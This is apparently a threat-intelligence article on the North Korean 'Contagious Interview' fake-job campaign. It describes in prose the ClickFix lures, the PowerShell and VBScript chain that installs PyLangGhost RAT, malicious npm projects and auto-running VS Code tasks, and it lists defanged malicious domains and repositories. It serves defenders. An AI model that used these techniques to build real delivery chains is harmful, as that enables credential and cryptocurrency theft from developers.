Fake Job Interviews Turn Deadly: North Korean Hackers Use ‘Contagious Interview’ Scam to Infect Tech Professionals Worldwide

CyberDefender 12 mins0

Cybersecurity researchers continue to uncover evolving tactics used in the “Contagious Interview” campaign, a sophisticated operation linked to the North Korean threat group known as NICKEL ALLEY. This group has consistently targeted professionals working in technology sectors by presenting fake job opportunities, conducting staged interviews, and ultimately delivering malware payloads.

Their approach combines social engineering with technical deception, making it highly effective against developers and IT professionals. This report explores how the campaign works, the tools and malware involved, and what organizations can do to defend against such threats.

Truncated VBScript code example from an infection, Source : Sophos

Background: Social Engineering Meets Cyber Espionage

NICKEL ALLEY has built a reputation for blending psychological manipulation with technical precision. Their attacks typically begin with fake recruitment efforts, often hosted on professional platforms like LinkedIn. Victims are drawn into what appears to be a legitimate hiring process.

To reinforce credibility, the attackers create:

  • Fake company profiles on LinkedIn
  • Supporting GitHub repositories
  • Professional-looking websites

These elements work together to create a believable ecosystem. Once trust is established, victims are guided through interview tasks that ultimately lead to malware execution.

Malicious repository disguised as fake crypto game, Source : Sophos

Attack Techniques and Entry Points

1. ClickFix Tactic and Malware Delivery

One of the most notable techniques used by this group is known as ClickFix. This method tricks victims into running commands under the assumption that they are fixing an issue in a coding environment.

Victims are typically shown an error message during a fake technical assessment. They are then instructed to execute a command locally. Instead of resolving any issue, the command initiates a malicious chain of actions.

This technique has been widely used throughout 2025 and has proven to be highly effective.

2. Infection Chain Breakdown

Once the victim executes the command, the following sequence occurs:

  • A compressed archive file is downloaded from an attacker-controlled server
  • The file is saved in the system’s temporary directory
  • PowerShell is used to extract the archive
  • A VBScript file is executed using Windows Script Host

These files are often disguised with harmless names such as “fix” or “patch,” making them appear legitimate.

The VBScript then extracts another archive containing supporting files and runs a command that launches a disguised Python executable.

3. PyLangGhost RAT Execution

The malware ultimately deployed is PyLangGhost RAT, a remote access trojan written in Python.

This malware is capable of:

  • Collecting system information
  • Executing arbitrary commands
  • Stealing browser credentials and cookies
  • Extracting cryptocurrency wallet data from Chrome extensions

Interestingly, this malware evolved from an earlier version written in Go (GoLangGhost RAT), showing the group’s adaptability.

Infrastructure and Delivery Mechanisms

NICKEL ALLEY frequently rotates domains and infrastructure to avoid detection. Domains are often registered just days before being used in attacks.

For example:

  • Domains like talentacq[.]pro were quickly deployed after registration
  • Fake error pages were designed to mislead users into trusting the domain
  • Misspellings and awkward phrasing were common but often overlooked by victims

In some cases, domains served as decoys when accessed via browser but delivered malware through command-line tools like curl.

GitHub-Based Attacks on Developers

Beyond ClickFix, the group also targets developers directly through GitHub repositories.

Fake Development Projects

Victims are asked to:

  • Clone a repository
  • Run npm install and npm start

These repositories appear to be legitimate software projects, often themed around blockchain or Web3 applications.

However, hidden within the code are scripts that:

  • Connect to malicious servers
  • Download malware payloads
  • Execute them locally

One example includes a Base64-encoded URL stored in environment variables, which points to a staging server.

Use of Cloud Platforms

The attackers frequently use platforms like Vercel to host malicious payloads. This allows them to:

  • Dynamically deliver different payloads
  • Adapt attacks based on the victim’s system
  • Avoid traditional detection methods

VS Code Exploitation

Another clever tactic involves abusing Visual Studio Code configuration files.

Malicious tasks are embedded in:

  • .vscode/tasks.json

These tasks automatically execute commands when the project folder is opened, often downloading malware using curl or wget.

This method is particularly dangerous because it leverages legitimate development workflows.

Indicators of Compromise (IOCs)

Security teams should monitor for the following indicators:

Domains and URLs

  • astrabytesyncs[.]com
  • talentacq[.]pro
  • publicshare[.]org
  • chainlink-api-v3[.]com

GitHub Repositories

  • github[.]com/astrasbytesyncs/web3-social-platform
  • github[.]com/mishalepo/test-project

Malware Hosting URLs

  • vercel-based API endpoints

File Hashes

Multiple MD5, SHA1, and SHA256 hashes are associated with:

  • VBScript loaders
  • PyLangGhost RAT variants

These indicators should be handled cautiously, as infrastructure changes frequently.

Detection and Defensive Measures

Organizations should strengthen defenses by focusing on behavioral detection rather than relying solely on static indicators.

Recommended Monitoring

  • Execution of PowerShell and curl commands from user systems
  • Activity originating from temporary directories
  • Node.js processes initiating outbound connections
  • Clipboard-based command execution

User Awareness

Employees should be trained to:

  • Verify unsolicited job offers
  • Avoid executing unknown commands
  • Report suspicious recruitment attempts

Risk Profile and Targeting Strategy

The campaign primarily targets:

  • Software developers
  • Blockchain engineers
  • Technology professionals open to freelance work

There is a strong emphasis on cryptocurrency theft, but the broader objective may include:

  • Corporate espionage
  • Supply chain compromise
  • Persistent access to enterprise systems

Our Analysis and Expert Opinion

From a defensive standpoint, the NICKEL ALLEY campaign highlights a growing shift in cyber threat strategies where human psychology is exploited just as aggressively as technical vulnerabilities. What makes this operation particularly concerning is not just the malware itself, but the carefully constructed environment that surrounds the attack.

The attackers are no longer relying on crude phishing emails. Instead, they are building full digital identities, complete with company profiles, repositories, and believable workflows. This creates a scenario where even experienced developers can be misled. The use of platforms like GitHub and Vercel adds another layer of legitimacy, making detection even harder.

Another important observation is the group’s patience and adaptability. They are willing to invest time in grooming their targets through fake interviews, which significantly increases the likelihood of success. This is not a mass-scale attack but a highly targeted operation with clear intent.

The technical execution also reflects a deep understanding of developer behavior. By embedding malicious actions into tools like VS Code or npm workflows, the attackers are effectively turning trusted environments into attack vectors. This approach bypasses traditional security controls because the actions appear normal within a development context.

The evolution from GoLangGhost to PyLangGhost also suggests that the group is actively refining its toolkit. Python-based malware offers flexibility and ease of modification, which likely contributes to its continued use.

In our view, the biggest challenge organizations face is not just detecting these attacks but preventing them at the human level. Security awareness training must evolve to include scenarios like fake job recruitment and developer-targeted attacks.

Additionally, organizations should enforce stricter policies around executing external code, especially on corporate systems. Sandboxing and zero-trust principles should be applied wherever possible.

Ultimately, this campaign serves as a reminder that modern cyber threats are no longer purely technical. They are psychological, adaptive, and deeply integrated into everyday workflows. Defending against them requires a combination of technical controls, user education, and continuous monitoring.

Conclusion

The Contagious Interview campaign demonstrates how advanced threat actors are redefining cyberattack strategies. By blending social engineering with sophisticated malware delivery techniques, NICKEL ALLEY has created a highly effective attack model.

Organizations must remain vigilant, adapt their defenses, and educate their workforce to stay ahead of such evolving threats.

CyberDefender